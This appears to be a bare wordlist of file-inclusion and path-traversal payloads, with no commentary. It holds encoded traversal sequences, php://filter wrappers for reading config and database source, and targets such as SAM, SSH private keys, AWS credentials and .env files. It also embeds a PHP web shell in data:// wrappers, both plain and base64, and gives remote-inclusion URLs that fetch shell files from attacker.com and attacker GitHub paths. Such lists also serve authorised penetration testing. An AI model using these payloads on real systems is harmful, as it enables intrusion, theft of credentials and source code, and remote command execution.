\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=db.php
php://filter/resource=index.php
php://input
php://temp
php://fd/0
php://fd/1
php://fd/2
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/version
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/auth.log
C:/Windows/System32/drivers/etc/hosts
C:/Windows/System32/config/SAM
C:/Windows/System32/config/SYSTEM
C:/Users/Public/Desktop/desktop.ini
C:/inetpub/wwwroot/web.config
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
http://127.0.0.1/etc/passwd
/etc/group
/etc/resolv.conf
/etc/ssh/sshd_config
/etc/mysql/my.cnf
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/var/www/html/config.php
/var/www/html/.env
/var/www/html/wp-config.php
/var/www/html/.git/config
/home/user/.ssh/id_rsa
/home/user/.bash_history
/root/.aws/credentials
/root/.docker/config.json
/proc/self/cwd
/proc/self/exe
/proc/cpuinfo
/proc/meminfo
/proc/devices
/proc/net/fib_trie
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
php://filter/convert.iconv.utf-8.utf-16/resource=config.php
php://filter/convert.base64-decode/convert.base64-encode/resource=config.php
php://filter/zlib.deflate/convert.base64-encode/resource=config.php
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
zip://uploads/malicious.zip#shell.php
phar://uploads/file.jpg/shell.php
../../../var/log/mail.log
../../../var/log/vsftpd.log
/var/lib/php/sessions/sess_abc123
/var/lib/php5/sessions/sess_abc123
/tmp/sess_abc123
//attacker.com/shell.txt
ftp://attacker.com/shell.txt
https://raw.githubusercontent.com/attacker/repo/shell.txt
https://gist.githubusercontent.com/attacker/id/raw/shell.txt
https://pastebin.com/raw/id
../../../etc/passwd%00%20
../../../etc/passwd%23
../../../etc/passwd?
../../../etc/passwd?.jpg
..%2f..%2f..%5cetc/passwd
..%5c..%5c..%5c..%2fetc%2fpasswd
..%e0%80%af..%e0%80%afetc/passwd
.%252e/.%252e/etc/passwd
...../...../etc/passwd
eettcc/ppaasssswwdd
e??tc/p??asswd
/e%00tc/p%00asswd
C:\xampp\apache\conf\httpd.conf
C:\wamp\apache\conf\httpd.conf
C:\Program Files\FileZilla Server\FileZilla Server.xml

